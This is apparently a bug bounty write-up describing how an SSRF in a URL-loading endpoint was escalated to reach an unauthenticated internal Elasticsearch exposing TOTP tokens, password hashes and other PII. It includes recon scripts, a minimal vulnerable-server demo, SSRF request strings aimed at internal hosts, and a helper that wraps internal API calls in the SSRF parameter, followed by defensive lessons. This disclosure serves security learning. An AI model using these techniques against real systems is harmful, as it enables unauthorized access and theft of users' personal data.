SSRF to PII Data Leak
How I escalated a Server-Side Request Forgery (SSRF) vulnerability into a PII leak affecting 50,000 users.
One of the first major bugs I found in my bug bounty journey was an SSRF-based Personally Identifiable Information (PII) data leak through an exposed internal service. It affected an estimated 50,000 users.
Disclaimer: Company names and exploit details have been intentionally omitted. All testing was conducted ethically and within the scope of the bug bounty program.
The Setup
I came across a program that had a pretty limited scope. Just one domain. But I was genuinely interested in the product, so I decided to take a look.
The first thing I did was go through the application like a normal user. I was not trying to find any bugs yet. I just wanted to understand how the product worked, what features it had, and what was possible from a user’s point of view.
After spending some time with it, I had a good idea of how everything worked. That is when I switched gears and started “hunting” for bugs.
Recon
I opened up the browser Developer Tools and looked through the JavaScript files. Luckily, the app was using React JS. I like going through React apps because they are usually easy to read (at least for me).
So I wrote a Python script that would grab all the JS files. In React apps, you usually find bundle files generated by build tools like Webpack or Vite. They look something like this:
```js
let chunkMap = {
  "chunk1": "29e3abf9",
  "chunk2": "a38cbfa1"
};
Object.entries(chunkMap).map(([name, hash]) => `${name}.${hash}.js`);
```
I copied the `chunkMap` object to my local environment and started building links to each JS file.
Imagine something like this:
```
https://example.com/chunk1.29e3abf9.js
```
Then I wrote another script to fetch those JS files and save them in a folder.
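The two scripts can be sketched together like this (a minimal reconstruction; the base URL, file names, and output folder are placeholders, not the real target):

```python
import pathlib
import urllib.request

BASE_URL = "https://example.com"  # placeholder, not the actual program's domain

chunk_map = {
    "chunk1": "29e3abf9",
    "chunk2": "a38cbfa1",
}

def build_urls(chunk_map: dict, base: str) -> list:
    # Recreate the `${name}.${hash}.js` naming scheme the bundle uses.
    return [f"{base}/{name}.{hash_}.js" for name, hash_ in chunk_map.items()]

def download_all(urls, out_dir="js_dump"):
    # Fetch each bundle file and save it locally for offline analysis.
    out = pathlib.Path(out_dir)
    out.mkdir(exist_ok=True)
    for url in urls:
        data = urllib.request.urlopen(url).read()
        (out / url.rsplit("/", 1)[-1]).write_bytes(data)

# download_all(build_urls(chunk_map, BASE_URL))  # network call, left commented out
```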
After downloading everything, I ran a tool called LinkFinder to pull out all the endpoints and API URLs used in the frontend.
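At its core, what LinkFinder does is scan JS source for quoted strings that look like URLs or API paths. A heavily simplified sketch of that idea (the regex here is my own, far cruder than LinkFinder's actual pattern):

```python
import re

# Match quoted strings that are either absolute URLs or root-relative paths.
ENDPOINT_RE = re.compile(
    r"""["'](https?://[^"'\s]+|/[A-Za-z0-9_./-]+(?:\?[^"'\s]*)?)["']"""
)

def extract_endpoints(js_source: str) -> list:
    """Return the unique URL-like strings found in a blob of JS."""
    return sorted(set(ENDPOINT_RE.findall(js_source)))
```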
That is when I saw this interesting endpoint:
```
/something/load?url=
```
The `?url=` parameter instantly raised red flags.
The SSRF
I tested the endpoint, and sure enough, it was vulnerable to SSRF. The response was coming straight to my screen.
For those who do not know, SSRF (Server-Side Request Forgery) is when you can get the server to make HTTP requests on your behalf. This lets you reach internal services, scan internal networks, and sometimes escalate to more serious issues.
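A minimal, self-contained sketch of the vulnerable pattern (all names here are hypothetical, not the actual application's code): the server fetches whatever URL the client passes in, so an attacker can make it reach hosts only the server can see.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class InternalService(BaseHTTPRequestHandler):
    """Stands in for an internal-only service the attacker cannot reach directly."""
    def do_GET(self):
        body = b"internal-only data"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence request logging
        pass

def vulnerable_load(url: str) -> bytes:
    # The bug: no validation of the user-supplied URL at all.
    with urllib.request.urlopen(url) as resp:
        return resp.read()

if __name__ == "__main__":
    server = HTTPServer(("127.0.0.1", 0), InternalService)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    # The attacker supplies ?url=http://127.0.0.1:<port>/ and the server
    # happily fetches its own "internal" service on their behalf.
    print(vulnerable_load(f"http://127.0.0.1:{server.server_address[1]}/"))
    server.shutdown()
```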
I wanted to dig deeper right away, but the program policy said I had to report any findings first before doing further testing. So I paused for a bit and wrote a quick report.
Escalation
After reporting, I wanted to see how far I could take this.
I tested different URL schemes like `gopher://`, `redis://`, and `file://` to see if I could turn this into something bigger. But there was a filter in place: only `http` and `https` were allowed.
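A filter like that is often just a scheme allow list. Here is a plausible reconstruction (my guess at the logic, not the program's actual code):

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def scheme_allowed(url: str) -> bool:
    # Reject gopher://, redis://, file://, and anything else that is not
    # plain HTTP(S). Note that a scheme check alone does NOT stop SSRF
    # against internal HTTP services, which is exactly what happened here.
    return urlparse(url).scheme.lower() in ALLOWED_SCHEMES
```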
So I changed focus. I wanted to know who was making the request.
I spun up a webhook service and pointed the SSRF at it like this:
```
/something/download-image?url=https://<my-secure-webhook-service>.com
```
When the request hit my server, I grabbed the IP address of the source. I ran the IP through Shodan, and I found a bunch of open ports (big red flag!).
```
https://www.shodan.io/host/<ip-address>
```
One of those was a Prometheus Node Exporter instance running inside the Kubernetes cluster.
It exposed a wide range of metrics; imagine seeing hundreds of internal IPs and ports across the infra. Among them was the internal IP of an Elasticsearch service running on port 9200.
Here is an example of what I saw:
```
node_ipvs_backend_connections_active{local_address="10.X.X.X",local_mark="",local_port="9200",proto="TCP",remote_address="10.X.X.X",remote_port="9200"}
```
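Metric dumps like this can be mined for internal targets mechanically. A rough sketch, keying off the label names in the `node_ipvs_backend_connections_active` sample above:

```python
import re

# Pull the local address/port labels out of each metric line.
LABEL_RE = re.compile(r'local_address="([^"]+)".*?local_port="(\d+)"')

def internal_targets(metrics_text: str) -> set:
    """Return (ip, port) pairs seen in node_ipvs_* metric lines."""
    return {(m.group(1), int(m.group(2))) for m in LABEL_RE.finditer(metrics_text)}
```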
The Data Leak
Elasticsearch was only exposed internally. But now I could reach it through SSRF.
```
/something/download-image?url=https://10.X.X.X:9200
```
And to make things worse (or better, depending on how you look at it), it had no authentication.
I started going through the Elasticsearch API. I was hoping to find something that could lead to RCE, maybe something like SSH keys. Instead, I found something even more serious.
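To probe Elasticsearch through the SSRF, each internal API path has to be wrapped into the `?url=` parameter. A sketch of that wrapping (the endpoint name and IP are placeholders, though `_cat/indices` and `_search` are standard Elasticsearch read APIs):

```python
from urllib.parse import quote

def ssrf_url(internal_url: str) -> str:
    # URL-encode the inner URL so it survives as a single query-string value.
    return "/something/download-image?url=" + quote(internal_url, safe="")

# Standard read-only Elasticsearch endpoints worth checking first:
probes = [
    ssrf_url("https://10.0.0.5:9200/_cat/indices?v"),
    ssrf_url("https://10.0.0.5:9200/_search?size=1"),
]
```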
The application was logging a lot of sensitive information in Elasticsearch, including:
- TOTP tokens used for 2FA
- Password hashes
- Emails
- Names
- Partial credit card details
- And more…
Overview
Here’s a high-level view of the full exploit chain:
1. Downloaded and searched the frontend JS bundles, which surfaced the `/something/load?url=` endpoint.
2. Confirmed SSRF; only `http` and `https` schemes were allowed.
3. Pointed the SSRF at a webhook to capture the source IP, then looked it up on Shodan.
4. Found an exposed Prometheus Node Exporter leaking internal IPs and ports.
5. Reached an unauthenticated internal Elasticsearch instance (port 9200) through the SSRF.
6. Elasticsearch logs contained PII for an estimated 50,000 users.
Finishing Up
That was the point where I stopped digging. I didn’t go any further after confirming the data leak. I was still new to bug bounty, and stumbling upon something this serious so early in my journey was honestly a little scary.
I updated the report with everything I had found.
The program patched the issue shortly after.
What I Learned
Blue Team Perspective:
- Internal does not mean safe. Use proper authentication and authorization for everything, including internal services (Zero Trust!!!).
- Do not store sensitive data (like password hashes, TOTP tokens, partial credit card info) in more places than necessary. Especially not in log or monitoring systems.
- Use an allow list when loading resources from user-provided URLs.
- Keep internal services actually internal. Do not expose them to the internet (especially if they contain compromising information).
Bug Bounty Perspective:
- Do not ignore parameters like `?url=`.
- Go through all the JavaScript. Yes, even the bundle files. That is where you find the good stuff.
- SSRF is one of the best bugs out there. You can escalate it in so many ways.
- Always follow program rules.
- Small scope does not mean no bugs.
- Try to increase the severity of your bugs. Not just for the bounty, but because it is actually fun to chain things together and see how far you can take it.